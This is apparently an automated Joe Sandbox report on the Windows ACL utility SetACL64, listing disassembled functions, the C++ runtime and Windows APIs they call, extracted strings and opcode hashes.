                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                                  • String ID:
                                                  • API String ID: 3702003507-0
                                                  • Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                                  • Instruction ID: 12d7c2fc5d7fead716c0b9a8935068ae77713f0bbc1a50b78ff98a9ff4e79795
                                                  • Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                                  • Instruction Fuzzy Hash: EC319221A0CA4281EB05BF27E4401F9E361EF8DBB4FA90131DA5D47797DEACE465C720
                                                  Function 00007FF7C171B340 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF7C171B638
                                                  • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF7C171B675
                                                    • Part of subcall function 00007FF7C1742864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7C171ABCE,?,?,00000000,00007FF7C17010A5), ref: 00007FF7C1742874
                                                  Strings
                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF7C171B424
                                                  • bad exception, xrefs: 00007FF7C171B390
                                                  • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF7C171B42F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_destroy$CriticalEnterSection
                                                  • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                  • API String ID: 2585855615-497953542
                                                  • Opcode ID: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                                                  • Instruction ID: 8b9544fd5aad9939d8ea09deb0b4ede2fba9e41b2164b21f60ce5a408d700c1b
                                                  • Opcode Fuzzy Hash: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
                                                  • Instruction Fuzzy Hash: 26B19F32B04B41CAEB10EF26E8401ACB3B5FB48B68B958136CE4D63B65EF78E555C750
                                                  Function 00007FF7C17011A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLast
                                                  • String ID: tss
                                                  • API String ID: 4252645092-1638339373
                                                  • Opcode ID: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                                                  • Instruction ID: 5ce87c9b2720ea6a526960d0611e514729592d330c06a174e6eb1169e8138832
                                                  • Opcode Fuzzy Hash: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
                                                  • Instruction Fuzzy Hash: 9D211D35E0974282EB10BF26A880079E360BF5D374FE10531DA5D427E6DFBCD5158B20
                                                  Function 00007FF7C17453F0 Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                                                  • Instruction ID: 3a5b5c0ead3bd44cca00ba11586b51f37a975162f9eae4243a243cc1a48e057c
                                                  • Opcode Fuzzy Hash: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
                                                  • Instruction Fuzzy Hash: EEB1C222A0A642C1EF65FF179440239E391AF4CBA4FA98435DE4D4B787DEBCE441CB60
                                                  Function 00007FF7C175E93C Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175E97D
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7C175E8FB,?,?,?,00007FF7C1758743), ref: 00007FF7C175EA3C
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7C175E8FB,?,?,?,00007FF7C1758743), ref: 00007FF7C175EABC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2210144848-0
                                                  • Opcode ID: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
                                                  • Instruction ID: 095bd6736d08e0d819842972d353804e044e4ad959b8aae5ae877ddd53144e59
                                                  • Opcode Fuzzy Hash: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
                                                  • Instruction Fuzzy Hash: 91819E22E1CA5285F750AF6684A06BCE7A0BB4C7B4FC44135DA0E53797DEBCA5458730
                                                  Function 00007FF7C173CB62 Relevance: 7.7, APIs: 5, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 1720291354-0
                                                  • Opcode ID: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                                                  • Instruction ID: 0f1c5b8efacfc6dd760392e648723ed98684da7d7b96c064ef42e61d869df626
                                                  • Opcode Fuzzy Hash: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
                                                  • Instruction Fuzzy Hash: 8161B662A18B4181EB14AF2AE44836DA761EB49FE4FD05132EB5D076DADFBCD491C310
                                                  Function 00007FF7C1760C1C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                                                  • Instruction ID: dc41c760846192fb91a36ee2e583dfd6889b0eb20122b3deadee5a62650f34f1
                                                  • Opcode Fuzzy Hash: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
                                                  • Instruction Fuzzy Hash: ED11B2A6E18B1309F7643A2AD8593F591416F5C370E854634E5AF0A7DFCEACE8404264
                                                  Function 00007FF7C173DC00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                  • String ID: gfffffff$gfffffff
                                                  • API String ID: 73155330-161084747
                                                  • Opcode ID: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                                                  • Instruction ID: a14d3c0320232cebcc2d4d6bd282c9fb5c23a9cb0cedb1d721ede73af98a7f4f
                                                  • Opcode Fuzzy Hash: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
                                                  • Instruction Fuzzy Hash: 25A1AEB2A04B8982DB10DF16E5442A9B3A4F75CBD4FD18236DE9C87746DF78E1A5C301
                                                  Function 00007FF7C1763804 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                  • API String ID: 3215553584-1196891531
                                                  • Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                                  • Instruction ID: 4ec37892d0eceb10c02087e1fc3cc8073f782c99089aba71c9c2d459c0fa60a6
                                                  • Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                                  • Instruction Fuzzy Hash: 8581C372E0C34285FB657F27811027CA6A0EB19B68FD5C035DA0E57A87CBADE901DF21
                                                  Function 00007FF7C17466FC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                                                  • Instruction ID: 746e0a36e49e418372c7c5311aaa366ef0f2c32c685da198e2acf6820bc477aa
                                                  • Opcode Fuzzy Hash: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
                                                  • Instruction Fuzzy Hash: 7F91C473A087858AE710EF66E8402ACBBA0F748798F50413AEF8D57756DF78D196CB00
                                                  Function 00007FF7C174B4C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: $*
                                                  • API String ID: 3215553584-3982473090
                                                  • Opcode ID: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                                                  • Instruction ID: ce92ce6f23dd9673f9c9141ca4c43070d531a5a9461f82f6324e4fda7bae0183
                                                  • Opcode Fuzzy Hash: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
                                                  • Instruction Fuzzy Hash: 2D61787290D251C6E768EF2A805407CF7A5EB0DB68FD41136E64E43296CFA8DC41DF61
                                                  Function 00007FF7C1746C70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                                                  • Instruction ID: cf4d054b83520c06e5361ee419f00b23398e9987091db30fdb958300115baac3
                                                  • Opcode Fuzzy Hash: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
                                                  • Instruction Fuzzy Hash: 7D51963290869286EB74AF22D444369B790FB4CBA4F944135EB9C47B96CF7CE492CF10
                                                  Function 00007FF7C175926C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: -$e+000$gfff
                                                  • API String ID: 3215553584-2620144452
                                                  • Opcode ID: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                                                  • Instruction ID: ffa25fec73880c55353865749b16e9916ca7c329d13c7fad26e4bd3e6ba1bd5a
                                                  • Opcode Fuzzy Hash: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
                                                  • Instruction Fuzzy Hash: 06512762B18BC286E7259F3A98503A9AB91E748BA0F889231C79C47BD7CE7DD444C710
                                                  Function 00007FF7C171D0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
                                                  • String ID: .log
                                                  • API String ID: 3890993197-299349702
                                                  • Opcode ID: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                                                  • Instruction ID: 715f8fc2b290717c7c8b7c7e87cc812a0a3fb975759e77ad5fe09b833afd5f7f
                                                  • Opcode Fuzzy Hash: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
                                                  • Instruction Fuzzy Hash: 2821A461A0864290FF10BF16E545179E361EB8E7F0FD11631DA6D066EADFACD4448B10
                                                  Function 00007FF7C173B1AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$Uninitialize
                                                  • String ID: Jo
                                                  • API String ID: 3194604352-866799578
                                                  • Opcode ID: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                                                  • Instruction ID: 66be9e19b2e8b1e2123e778fffcfc7be446047dab3eab695ddfd9d8a908a7a6e
                                                  • Opcode Fuzzy Hash: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                                                  • Instruction Fuzzy Hash: 26118F62B1864281FB04FF26E1953BEA261AB48BA4FC04431CB0C03693DFBCE4A48220
                                                  Function 00007FF7C1740A30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: GenericMask
                                                  • String ID: 9$?
                                                  • API String ID: 3675760450-2473970582
                                                  • Opcode ID: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
                                                  • Instruction ID: e9caed3cd4002ebdb280f8032dd0d3ae624d46318f246aeb8ab3dda2965a9825
                                                  • Opcode Fuzzy Hash: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
                                                  • Instruction Fuzzy Hash: 60114976A086458BEB21EF05F49512AB7B0F78D758F900135F78D06A1ADFBDD1598F00
                                                  Function 00007FF7C17126D0 Relevance: 6.2, APIs: 4, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID:
                                                  • API String ID: 3936042273-0
                                                  • Opcode ID: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                                                  • Instruction ID: 08ecbf9622531217438e87a6d9419f71eea05d9b0f2d1b641f7937fd4d942acd
                                                  • Opcode Fuzzy Hash: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                                                  • Instruction Fuzzy Hash: 23719232B15B4589EB00AF66D4403ADA371EB58BA8FA05631DB6C137DAEFB8D190C350
                                                  Function 00007FF7C1763EF8 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_get_daylight
                                                  • String ID:
                                                  • API String ID: 72036449-0
